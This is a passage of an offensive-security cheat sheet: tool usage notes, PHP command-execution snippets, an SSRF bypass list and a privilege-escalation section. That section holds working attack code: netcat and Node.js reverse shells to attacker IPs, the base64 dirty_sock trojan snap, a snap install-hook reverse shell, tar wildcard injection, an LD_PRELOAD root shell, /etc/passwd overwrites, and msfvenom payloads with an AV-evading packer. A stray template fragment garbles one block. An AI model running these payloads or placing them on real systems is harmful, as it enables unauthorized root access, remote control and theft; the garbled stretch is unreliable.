Assetfinder 2401 | 2402 | ```bash 2403 | # Download/Install 2404 | sudo apt install assetfinder 2405 | ``` 2406 | 2407 | ### Dalfox 2408 | 2409 | ```bash 2410 | # Download/Install 2411 | GO111MODULE=on go get -v github.com/hahwul/dalfox/v2 2412 | 2413 | # References 2414 | https://github.com/hahwul/dalfox 2415 | ``` 2416 | 2417 | ### PowerUpSQL.ps1 2418 | 2419 | ```code 2420 | => Commands 2421 | $ Get-SQLInstanceLocal -Verbose 2422 | $ Get-SQLInstanceDomain -Verbose 2423 | $ Get-SQLServerInfo -Verbose -Instance query.bank.local 2424 | $ Invoke-SQLAudit -Verbose -Instance query.bank.local 2425 | $ Get-SQLQuery -instance query.bank.local -query "select * from master..sysservers" 2426 | 2427 | => References 2428 | $ https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet 2429 | ``` 2430 | 2431 | ### PowerUp.ps1 2432 | 2433 | ```bash 2434 | => Download 2435 | $ iex(iwr -usebasicparsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1)) 2436 | 2437 | => Command 2438 | $ Invoke-AllChecks 2439 | $ Find-ProcessDLLHijack 2440 | 2441 | => References 2442 | $ https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 2443 | ``` 2444 | 2445 | ### Windows Vulnerable Machine (Setup/Ready) 2446 | 2447 | ```bash 2448 | => References 2449 | $ https://github.com/RedTeamOperations/Vulnerable_Machine/blob/master/Escalate%20-%20A%20Windows%20Vulnerable%20Virtual%20Machine 2450 | $ https://github.com/Tib3rius/Windows-PrivEsc-Setup 2451 | ``` 2452 | 2453 | ### Linux Vulnerable Machine (Setup/Ready) 2454 | 2455 | ```bash 2456 | => References 2457 | $ https://github.com/RedTeamOperations/Vulnerable_Machine/blob/master/Escalate%20-%20A%20Linux%20Vulnerable%20Virtual%20Machine 2458 | 2459 | ``` 2460 | 2461 | ### Inveigh 2462 | 2463 | ```bash 2464 | => Commands 2465 | $ Invoke-InveighRelay -ConsoleOutput -Y -StatusOutput N -Command "net user commandtest Passw0rd123! 
$ /add" -Attack Enumerate,Execute,Session 2466 | $ Invoke-Inveigh -ConsoleOutput Y 2467 | $ Stop-Inveigh 2468 | $ Invoke-Inveigh -FileOutput Y 2469 | ``` 2470 | ### Metasploit 2471 | 2472 | ``` 2473 | => Set Proxies 2474 | $ set PROXIES HTTP:127.0.0.1:8080 2475 | $ set ReverseAllowProxy true 2476 | 2477 | => Mimikatz 2478 | $ load mimikatz 2479 | 2480 | => Commands 2481 | $ ps 2482 | $ help 2483 | 2484 | => Msfvenom 2485 | $ msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f raw -o shell.php 2486 | ``` 2487 | 2488 | ### Nessus 2489 | 2490 | ```bash 2491 | => Download 2492 | $ https://www.tenable.com/downloads/nessus 2493 | 2494 | => Install 2495 | $ sudo apt install ./Nessus-8.14.0-debian6_amd64.deb 2496 | 2497 | => Start 2498 | $ sudo /bin/systemctl start nessusd.service 2499 | 2500 | => Stop 2501 | $ sudo /bin/systemctl stop nessusd.service 2502 | 2503 | => Web 2504 | $ https://localhost:8834/ 2505 | 2506 | => No PDF? 2507 | $ Install Java on the machine 2508 | $ Follow the steps in here : https://community.tenable.com/s/article/PDF-Option-is-Missing-in-Nessus 2509 | ``` 2510 | 2511 | ### CobaltStrikeParser 2512 | 2513 | ```bash 2514 | # Download 2515 | https://github.com/Apr4h/CobaltStrikeScan 2516 | 2517 | # Commands 2518 | python3 parse_beacon_config.py beacon.exe 2519 | 2520 | # Information we can get 2521 | - SleepTime 2522 | - Jitter 2523 | - PublicKey_MD5 2524 | - Port 2525 | - BeaconType 2526 | - HttpPostUri 2527 | - Many more 2528 | ``` 2529 | 2530 | ### Sharperner 2531 | 2532 | ```bash 2533 | # Download 2534 | https://github.com/aniqfakhrul/Sharperner 2535 | 2536 | # Commands 2537 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f base64 2538 | .\Sharperner.exe /file:base64.txt /key:'nothinghere' /out:payload.exe 2539 | 2540 | ``` 2541 | 2542 | ### TruffleHog 2543 | 2544 | ```bash 2545 | [Install truffleHog] 2546 | pip install truffleHog 2547 | 2548 | [Usage] 2549 | trufflehog --regex --entropy=False 
https://github.com/example/example.git   # this is the v2 CLI (pip 'truffleHog'); the linked trufflesecurity repo is now v3, whose syntax is 'trufflehog git https://github.com/example/example.git'
targets.project }} 2615 | {% endfor % } 2616 | 2617 | ``` 2618 | 2619 | ### Sqlmap 2620 | 2621 | ``` 2622 | => Command 2623 | $ sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST 2624 | $ sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b" 2625 | $ sqlmap -r post.req --level=5 --risk=3 --os-shell 2626 | $ sqlmap -r item.req --proxy http://127.0.0.1:8080 --level 4 --risk 3 -p parameters --technique=S --dbms=mssql --batch --random-agent --force-ssl -D databases -T tables -C columns --dump --flush 2627 | $ sqlmap -r item.req --proxy http://127.0.0.1:8080 --level 4 --risk 3 -p parameters --technique=S --dbms=mssql --batch --random-agent --force-ssl --sql-query="select len(coumns) from tables;" 2628 | ``` 2629 | 2630 | ### Nim 2631 | 2632 | ``` 2633 | => Download 2634 | $ https://nim-lang.org/ 2635 | 2636 | => Commands 2637 | $ nim c .\practice.nim 2638 | 2639 | => Variables 2640 | $ var age: int 2641 | $ var ageSpecified: int = 25 2642 | $ var variableImplicit = "Hello" 2643 | $ var my_variable != var My_variable 2644 | $ var my_variable == var myVariable 2645 | 2646 | => Function 2647 | Void 2648 | proc header(): void = 2649 | echo "here" 2650 | 2651 | => Output 2652 | $ echo "Age: ", ageSpecified 2653 | 2654 | => Install (Nimble) 2655 | $ nimble install winim 2656 | 2657 | => References 2658 | $ https://github.com/byt3bl33d3r/OffensiveNim 2659 | $ https://blog.eduonix.com/web-programming-tutorials/nim-programming-language-syntaxes/ 2660 | $ https://ajpc500.github.io/nim/Shellcode-Injection-using-Nim-and-Syscalls/ 2661 | $ https://github.com/ajpc500/NimlineWhispers 2662 | $ https://gist.github.com/ChoiSG/e0a7f5949638dfe363bcd418d94dcc34 2663 | $ https://ilankalendarov.github.io/posts/nim-ransomware/ 2664 | $ https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ 2665 | ``` 2666 | 2667 | ### Cs 2668 | 2669 | ```bash 2670 | # Split By Whitespace and append every end words 2671 | passPhrase = "aa bb cc dd ee ff"; 2672 | passPhrase = 
string.Join("\"" + Environment.NewLine + "\"", passPhrase.Split() 2673 | .Select((word, index) => new { word, index }) 2674 | .GroupBy(x => x.index / 2) 2675 | .Select(grp => string.Join(" ", grp.Select(x => x.word)))); 2676 | 2677 | ``` 2678 | 2679 | ### Bypass 403 (Forbidden) 2680 | 2681 | ```bash 2682 | => Tools 2683 | $ https://github.com/lobuhi/byp4xx 2684 | -> ./byp4xx.sh -c "http://localhost/" 2685 | $ https://github.com/iamj0ker/bypass-403 2686 | 2687 | => Header 2688 | $ X-Originating-IP: 127.0.0.1 2689 | $ X-Forwarded-For: 127.0.0.1 2690 | $ X-Remote-IP: 127.0.0.1 2691 | $ X-Remote-Addr: 127.0.0.1 2692 | $ X-Original-URL: /admin 2693 | $ X-Rewrite-URL: /admin 2694 | ``` 2695 | 2696 | ### Mobsfscan 2697 | 2698 | ```bash 2699 | # Download 2700 | https://github.com/MobSF/mobsfscan 2701 | ``` 2702 | 2703 | ### Evil-Winrm 2704 | 2705 | ```bash 2706 | # Commands 2707 | evil-winrm -u 'Administrator' -H '370ddcf45959b2293427baa70376e14e' -i 10.10.10.10 2708 | ``` 2709 | 2710 | ### Reminna 2711 | 2712 | ```bash 2713 | # Download 2714 | https://remmina.org/how-to-install-remmina/ 2715 | 2716 | # Installing 2717 | sudo apt install software-properties-common 2718 | sudo apt update 2719 | sudo apt-add-repository ppa:remmina-ppa-team/remmina-next 2720 | sudo apt update 2721 | sudo apt install remmina remmina-plugin-rdp remmina-plugin-secret 2722 | sudo killall remmina 2723 | sudo remmina 2724 | ``` 2725 | 2726 | ### Sysmon 2727 | 2728 | ```bash 2729 | # Download 2730 | https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon 2731 | 2732 | # Event 2733 | Event ID 1: Process creation 2734 | Event ID 2: A process changed a file creation time 2735 | Event ID 3: Network connection 2736 | Event ID 4: Sysmon service state changed 2737 | Event ID 5: Process terminated 2738 | Event ID 6: Driver loaded 2739 | Event ID 7: Image loaded 2740 | Event ID 8: CreateRemoteThread 2741 | Event ID 9: RawAccessRead 2742 | Event ID 10: ProcessAccess 2743 | Event ID 11: FileCreate 2744 
| Event ID 12: RegistryEvent (Object create and delete) 2745 | Event ID 13: RegistryEvent (Value Set) 2746 | Event ID 14: RegistryEvent (Key and Value Rename) 2747 | Event ID 15: FileCreateStreamHash 2748 | Event ID 16: ServiceConfigurationChange 2749 | Event ID 17: PipeEvent (Pipe Created) 2750 | Event ID 18: PipeEvent (Pipe Connected) 2751 | Event ID 19: WmiEvent (WmiEventFilter activity detected) 2752 | Event ID 20: WmiEvent (WmiEventConsumer activity detected) 2753 | Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected) 2754 | Event ID 22: DNSEvent (DNS query) 2755 | Event ID 23: FileDelete (File Delete archived) 2756 | Event ID 24: ClipboardChange (New content in the clipboard) 2757 | Event ID 25: ProcessTampering (Process image change) 2758 | Event ID 26: FileDeleteDetected (File Delete logged) 2759 | Event ID 255: Error 2760 | 2761 | 2762 | # References 2763 | https://github.com/SwiftOnSecurity/sysmon-config 2764 | https://github.com/trustedsec/SysmonCommunityGuide 2765 | ``` 2766 | 2767 | ### Scp 2768 | 2769 | ```bash 2770 | # Commands 2771 | scp -P 2249 file.txt user@10.10.10.:. 
2772 | ``` 2773 | 2774 | ### Mdb 2775 | 2776 | ```bash 2777 | # Download MdbTools 2778 | sudo apt install mdbtools 2779 | 2780 | # Commands 2781 | mdb-tables file.mdb 2782 | mdb-tables -T backup.mdb 2783 | mdb-sql file.mdb 2784 | * list tables 2785 | * go 2786 | 2787 | # Tricks 2788 | for i in $(mdb-tables -T backup.mdb | cut -d' ' -f2);do mdb-export -H backup.mdb $i > /tmp/test; sed "s/.*(//g" /tmp/test | sed 's/"//g' | sed "s/).*//g" | tr , '\n' >> word.txt;done 2789 | ``` 2790 | 2791 | ### Evolution 2792 | 2793 | ```bash 2794 | # Install 2795 | sudo apt-get install evolution evolution-plugins 2796 | 2797 | # Commands 2798 | evolution 2799 | 2800 | # References 2801 | https://rc.partners.org/kb/article/2702 2802 | ``` 2803 | 2804 | ### readpst 2805 | 2806 | ```bash 2807 | # Install 2808 | sudo apt-get install -y pst-utils 2809 | 2810 | # Commands 2811 | readpst file.pst 2812 | cat file.mbox 2813 | ``` 2814 | 2815 | ### Docker 2816 | 2817 | ```bash 2818 | => Commands 2819 | $ docker images 2820 | $ docker image ls 2821 | $ docker pull ubuntu 2822 | $ docker run -it ubuntu 2823 | $ docker run -it 2824 | $ docker build /path_to_Dockerfile/ 2825 | $ docker rmi -f 2826 | 2827 | => Curl 2828 | $ curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" 2829 | $ curl -s localhost:8080/images/json -H "Content-Type: application/json" 2830 | 2831 | => Api 2832 | $ /images/json 2833 | $ /container/json 2834 | 2835 | => References 2836 | $ https://securityboulevard.com/2019/02/abusing-docker-api-socket/ 2837 | $ https://github.com/flast101/docker-privesc 2838 | ``` 2839 | 2840 | ### Docker-compose 2841 | 2842 | ```bash 2843 | # Commands 2844 | docker-compose up --build --force-recreate -d 2845 | docker-compose up --build -d 2846 | 2847 | # References 2848 | https://docs.docker.com/compose/install/ 2849 | ``` 2850 | 2851 | ### Dockerfile 2852 | 2853 | ```bash 2854 | #====Example==== 2855 | FROM node:7-onbuild 2856 | LABEL maintainer "test@example.com" 2857 | 
HEALTHCHECK --interval=5s \ 2858 | --timeout=5s \ 2859 | CMD curl -f http;//127.0.0.1:8000 || exit 1 2860 | EXPOSE 8000 2861 | 2862 | #====Example==== 2863 | ``` 2864 | 2865 | ### Jenkinsfile 2866 | 2867 | ```bash 2868 | #====Example==== 2869 | node { 2870 | def app 2871 | 2872 | stage('Clone repository'){ 2873 | checkout scm 2874 | } 2875 | stage('Build iamge'){ 2876 | app = docker.build("username/docker") 2877 | } 2878 | stage('Test image'){ 2879 | app.inside { 2880 | sh 'echo "Tests passed"' 2881 | } 2882 | } 2883 | stage('Push image'){ 2884 | docker.withRegistry('https://registry.hub.docker.com','docker-hub-credentials'){ 2885 | app.push("$(env.BUILD_NUMBER)") 2886 | app.push("latest") 2887 | } 2888 | } 2889 | } 2890 | ``` 2891 | 2892 | ### PHP 2893 | 2894 | ```bash 2895 | ====Comparisons==== 2896 | var_dump(0 == "a"); // 0 == 0 -> true 2897 | var_dump("1" == "01"); // 1 == 1 -> true 2898 | var_dump("10" == "1e1"); // 10 == 10 -> true 2899 | var_dump(100 == "1e2"); // 100 == 100 -> true 2900 | var_dump(.0 == "00"); // 0 == 0 2901 | 2902 | ====is_numeric()==== 2903 | is_numeric(" \t\r\n 123") => true 2904 | is_numeric(' 87') => true 2905 | is_numeric('87 ') => false 2906 | is_numeric(' 87 ') => false 2907 | is_numeric('0xdeadbeef') 2908 | 2909 | # Returns True 2910 | ' -.0' 2911 | '0.' 2912 | ' +2.1e5' 2913 | ' -1.5E+25' 2914 | '1.e5' 2915 | '9e9' 2916 | 2917 | ====preg_replace()==== 2918 | #Example1 2919 | preg_replace('/a/e', 'sYstEm(ls)', 'aaaa'); 2920 | 2921 | #Example2 2922 | preg_replace('/a/e', '$output = `cat flag.txt`; echo "
$output
";', 'aaaa'); 2923 | 2924 | #Example3 2925 | preg_replace('/a/e', 'sYstEm("ls")', 'aaaa'); 2926 | 2927 | ====Command Execution==== 2928 | #exec() 2929 | exec("whoami"); 2930 | 2931 | #passthru() 2932 | passthru("whoami"); 2933 | 2934 | #system() 2935 | system("whoami"); 2936 | 2937 | #shell_exec() 2938 | shell_exec("whoami"); 2939 | 2940 | #backticks (use shell_exec) 2941 | `whoami`; 2942 | 2943 | #popen() 2944 | popen("whoami","r"); 2945 | 2946 | #proc_open() 2947 | proc_open("whoami"); 2948 | 2949 | #pcntl_exec 2950 | pcntl_exec("whoami"); 2951 | 2952 | ====Read Files==== 2953 | #readfile() 2954 | readfile("/etc/hosts"); 2955 | 2956 | #file_get_contents() 2957 | file_get_contents("/etc/hosts"); 2958 | 2959 | #fopen()/fread() 2960 | fread(fopen("/etc/hosts","r"),filesize("/etc/hosts")); 2961 | 2962 | #include_once(); 2963 | include_once('/etc/hosts'); 2964 | 2965 | #include(); 2966 | include('/etc/hosts'); 2967 | 2968 | #require_once() 2969 | require_once('/etc/hosts'); 2970 | 2971 | #require() 2972 | require('/etc/hosts'); 2973 | 2974 | ====List Files/Directories==== 2975 | #opendir() 2976 | 2977 | 2992 | 2993 | #scandir() 2994 | 2995 | 3003 | 3004 | #Readdir() 3005 | 3006 | 3025 | 3026 | #Glob() 3027 | 3028 | 3033 | 3034 | #Information Disclosure 3035 | phpinfo 3036 | posix_mkfifo 3037 | posix_getlogin 3038 | posix_ttyname 3039 | getenv 3040 | get_current_user 3041 | proc_get_status 3042 | get_cfg_var 3043 | disk_free_space 3044 | disk_total_space 3045 | diskfreespace 3046 | getcwd 3047 | getlastmo 3048 | getmygid 3049 | getmyinode 3050 | getmypid 3051 | getmyuid 3052 | 3053 | 3054 | # References 3055 | - https://github.com/w181496/Web-CTF-Cheatsheet 3056 | - https://stackoverflow.com/questions/3115559/exploitable-php-functions 3057 | - https://wiki.x10sec.org/web/php/php/ 3058 | 3059 | ``` 3060 | 3061 | ### Tmux Commands 3062 | 3063 | ```bash 3064 | => Start new session 3065 | $ tmux new -s newsession 3066 | 3067 | => Split Pane Vertically 3068 | $ Ctrl + b + " 
3069 | 3070 | => Split Pane Horizontally 3071 | $ Ctrl + b + % 3072 | 3073 | => List session 3074 | $ tmux ls 3075 | 3076 | => Attach to last session 3077 | $ tmux a 3078 | 3079 | => Attach to specific session 3080 | $ tmux a -t newsession 3081 | 3082 | => Toogle Pane Zoom 3083 | $ Ctrl + b + z 3084 | 3085 | => Create new window 3086 | $ Ctrl + b + c 3087 | 3088 | => Next Windows 3089 | $ Ctrl + b + n 3090 | 3091 | => 3092 | 3093 | => References 3094 | https://tmuxcheatsheet.com/ 3095 | ``` 3096 | 3097 | ### Vim Commands 3098 | 3099 | ```bash 3100 | => References 3101 | $ https://vim.rtorr.com/ 3102 | ``` 3103 | 3104 | ### Firebird 3105 | 3106 | ```bash 3107 | # Commands 3108 | 3109 | # References 3110 | ``` 3111 | 3112 | ### SSRF (Server Side Request Forgery) 3113 | 3114 | ```bash 3115 | # List 3116 | http://127.0.0.1 3117 | http://127.1 3118 | http://0 3119 | http://0.0.0.0 3120 | http://localhost 3121 | http://[::] 3122 | http://[0000::1] 3123 | http://[0:0:0:0:0:ffff:127.0.0.1] 3124 | http://①②⑦.⓪.⓪.⓪ 3125 | http://127.127.127.127 3126 | http://127.0.1.3 3127 | http://127.0.0.0 3128 | http://2130706433/ 3129 | http://017700000001 3130 | http://3232235521/ 3131 | http://3232235777/ 3132 | http://0x7f000001/ 3133 | http://0xc0a80014/ 3134 | http://{domain}@127.0.0.1 3135 | http://127.0.0.1#{domain} 3136 | http://{domain}.127.0.0.1 3137 | http://127.0.0.1/{domain} 3138 | http://127.0.0.1/?d={domain} 3139 | https://{domain}@127.0.0.1 3140 | https://127.0.0.1#{domain} 3141 | https://{domain}.127.0.0.1 3142 | https://127.0.0.1/{domain} 3143 | https://127.0.0.1/?d={domain} 3144 | http://{domain}@localhost 3145 | http://localhost#{domain} 3146 | http://{domain}.localhost 3147 | http://localhost/{domain} 3148 | http://localhost/?d={domain} 3149 | http://127.0.0.1%00{domain} 3150 | http://127.0.0.1?{domain} 3151 | http://127.0.0.1///{domain} 3152 | https://127.0.0.1%00{domain} 3153 | https://127.0.0.1?{domain} 3154 | https://127.0.0.1///{domain} 3155 | 3156 | # 
References 3157 | https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery 3158 | ``` 3159 | 3160 | ### Cl.exe 3161 | 3162 | ```bash 3163 | # Commands 3164 | -> cmd /c 'call "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat" && cl /LD calc.c ' 3165 | 3166 | ``` 3167 | 3168 | ### Core File Dumps 3169 | 3170 | ```bash 3171 | # Crash 3172 | kill -SIGBUS 3173 | 3174 | # Unpack 3175 | apport-unpack /var/crash/.crash /tmp/newdirectory 3176 | 3177 | # View Dump 3178 | strings CoreDump 3179 | 3180 | # Enable CoreDump Generation 3181 | prctl(PR_SET_DUMPABLE, 1); 3182 | 3183 | # References 3184 | -> https://access.redhat.com/solutions/4896 3185 | ``` 3186 | 3187 | ### Bash Tricks 3188 | 3189 | ```bash 3190 | (1) Write Multiple Lines 3191 | cat >note.txt <<'EOL' 3192 | 3193 | 3194 | EOL 3195 | 3196 | ``` 3197 | 3198 | # C. SUID/CAP/SUDO/GROUP 3199 | 3200 | ### Python 3201 | 3202 | ```bash 3203 | # SUID 3204 | python -c 'import os; os.execl("/bin/sh", "sh", "-p")' 3205 | python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")' 3206 | 3207 | # Capabilities 3208 | python -c 'import os; os.setuid(0); os.system("/bin/sh")' 3209 | python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' 3210 | python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")' 3211 | 3212 | # SUDO 3213 | sudo python3 /pathto/script.py 3214 | 3215 | # Notes (Found) 3216 | eval('144+0|__import__("os").system("nc -e /bin/sh 10.10.10.10 443")') 3217 | ``` 3218 | 3219 | ### LXD 3220 | 3221 | ```bash 3222 | #If No Internet Access 3223 | 1. git clone https://github.com/saghul/lxd-alpine-builder.git 3224 | 2. cd lxd-alpine-builder 3225 | 3. ./build-alpine 3226 | 4. Upload file.tar.gz into target machine 3227 | 5. lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage 3228 | 6. lxc init myimage ignite -c security.privileged=true 3229 | 7. 
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true 3230 | 8. lxc start ignite 3231 | 9. lxc exec ignite /bin/sh 3232 | ``` 3233 | 3234 | ### Gimp 3235 | 3236 | ```bash 3237 | # SUID 3238 | gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl("/bin/sh", "sh", "-p")' 3239 | 3240 | # References 3241 | https://gtfobins.github.io/gtfobins/gimp/ 3242 | ``` 3243 | 3244 | ### Gdb 3245 | 3246 | ```bash 3247 | # SUID 3248 | gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit 3249 | 3250 | # SUDO 3251 | sudo gdb -nx -ex '!sh' -ex quit 3252 | 3253 | # Capabilities 3254 | gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit 3255 | 3256 | # References 3257 | https://gtfobins.github.io/gtfobins/gdb/ 3258 | ``` 3259 | 3260 | ### Node 3261 | 3262 | ```bash 3263 | # Sudo 3264 | sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})' 3265 | ``` 3266 | 3267 | ### Maidag 3268 | 3269 | ```bash 3270 | # Sudo 3271 | - Create one file /tmp/passwd 3272 | - echo -e "\nnewuser:c.gVrEYFACZTQ:0:0:root:/root:/bin/bash" > /tmp/passwd 3273 | - sudo maidag --url '/etc/passwd' < /tmp/passwd 3274 | - su newuser 3275 | ``` 3276 | 3277 | ### Folder (Suid) 3278 | 3279 | ```bash 3280 | - If there is a folder with SUID 3281 | - And it is a webserver 3282 | - Try to upload php reverse shell 3283 | - Access it from web 3284 | ``` 3285 | 3286 | ### Cat 3287 | 3288 | ```bash 3289 | # Sudo 3290 | sudo /bin/cat /opt/games/../../../etc/passwd 3291 | ``` 3292 | 3293 | ### Qpdf 3294 | 3295 | ```code 3296 | # Install 3297 | sudo apt install qpdf 3298 | 3299 | # Commands 3300 | qpdf --encrypt password password 40 -- test.pdf test2.pdf 3301 | qpdf --password=password --decrypt test2.pdf test.pdf 3302 | ``` 3303 | 3304 | ### Snap 3305 | 3306 | ```bash 3307 | # Sudo 3308 | # Malicious snap to create dirty_sock:dirty_sock 3309 | 3310 | ## python3 snapmal.py 3311 | import base64 3312 | 3313 | TROJAN_SNAP = (''' 3314 | 
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/ 3315 | /////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh 3316 | ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5 3317 | TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo 3318 | T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl 3319 | Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt 3320 | ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv 3321 | ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n 3322 | L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt 3323 | b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe 3324 | rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj 3325 | rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA 3326 | AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2 3327 | XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5 3328 | RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA 3329 | AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''+ 'A' * 4256 + '==') 3330 | 3331 | blob = base64.b64decode(TROJAN_SNAP) 3332 | file = open("sample.snap", "wb") 3333 | file.write(blob) 3334 | file.close() 3335 | 3336 | # Run 3337 | sudo snap install --dangerous --devmode exploit.snap 3338 | 3339 | #another method sudo install 3340 | [Sudo snap install] 3341 | COMMAND="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.23 443 >/tmp/f" 3342 | cd $(mktemp -d) 3343 | mkdir -p meta/hooks 3344 | printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install 3345 | chmod +x meta/hooks/install 3346 | fpm -n xxxx -s dir -t snap -a all meta 3347 | 3348 | # Commands 3349 | sudo /usr/bin/snap install 
test.snap --dangerous --devmode 3350 | ``` 3351 | 3352 | ### Msfconsole 3353 | 3354 | ```bash 3355 | # Sudo 3356 | sudo msfconsole -x bash 3357 | 3358 | # Commands 3359 | ``` 3360 | 3361 | ### Docker 3362 | 3363 | ```bash 3364 | # Group docker 3365 | 3366 | ``` 3367 | 3368 | ### Initctl 3369 | 3370 | ```bash 3371 | # Save as test.conf in /etc/init/testconf 3372 | description "Test node.js server" 3373 | author "root" 3374 | 3375 | script 3376 | exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /tmp/reverse.js 3377 | end script 3378 | 3379 | # Nodejs - save as /tmp/reverse.js 3380 | (function(){ 3381 | var net = require("net"), 3382 | cp = require("child_process"), 3383 | sh = cp.spawn("/bin/sh", []); 3384 | var client = new net.Socket(); 3385 | client.connect(1337, "10.10.14.23", function(){ 3386 | client.pipe(sh.stdin); 3387 | sh.stdout.pipe(client); 3388 | sh.stderr.pipe(client); 3389 | }); 3390 | return /a/; // Prevents the Node.js application form crashing 3391 | })(); 3392 | 3393 | # Commands 3394 | sudo /sbin/initctl stop test 3395 | sudo /sbin/initctl start test 3396 | ``` 3397 | 3398 | ### WildCard (*) 3399 | 3400 | ```bash 3401 | #===Chown/Chmod=== 3402 | - Imagine there is a cronjob 3403 | * chown user1:user2 /opt/* 3404 | - touch -- --reference=reference 3405 | - touch reference 3406 | - chmod 6777 reference 3407 | - ln -s /etc/shadow /opt/shadow 3408 | - ln -d -s /root /opt/root 3409 | 3410 | ## References 3411 | - https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/ 3412 | 3413 | #===Tar=== 3414 | - Imagine there is cronjob 3415 | * cd /opt;tar cf /opt/backup.tar * 3416 | - touch -- "--checkpoint=1" 3417 | - touch -- "--checkpoint-action=exec=sh shell.sh" 3418 | - echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f" > shell.sh 3419 | - echo "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash" > shell.sh 3420 | - chmod 777 ./"--checkpoint=1" 3421 | - chmod 777 ./"--checkpoint-action=exec=sh shell.sh" 
3422 | - chmod 777 shell.sh 3423 | 3424 | #===Parameter=== 3425 | - Imagine there is wildcard in binary with --help 3426 | * sudo cat * --help 3427 | - sudo cat /etc/paswd -help 3428 | - Try to look if there is any more parameter that can run so that it will run that before --help 3429 | 3430 | ## References 3431 | - https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/ 3432 | - https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks 3433 | 3434 | ``` 3435 | 3436 | ### Vim 3437 | 3438 | ```bash 3439 | # SUID 3440 | vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' 3441 | vim.basic -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' 3442 | vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' 3443 | vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p") 3444 | ``` 3445 | 3446 | ### Passwd Writable 3447 | 3448 | ```bash 3449 | # Change root password 3450 | -> openssl passwd password123 3451 | -> replace in root row 3452 | -> root:c.gVrEYFACZTQ:0:0:root:/root:/bin/bash 3453 | 3454 | ``` 3455 | 3456 | ### LD Preload 3457 | 3458 | ```bash 3459 | $ ===One=== 3460 | include 3461 | include 3462 | include 3463 | void _init() { 3464 | unsetenv("LD_PRELOAD"); 3465 | setgid(0); 3466 | setuid(0); 3467 | system("/bin/sh"); 3468 | } 3469 | gcc -fPIC -shared -o shell.so shell.c -nostartfiles 3470 | sudo LD_PRELOAD=/tmp/shell.so find 3471 | ``` 3472 | 3473 | ### Csvtools 3474 | 3475 | ```bash 3476 | # Commands 3477 | sudo csvtool call 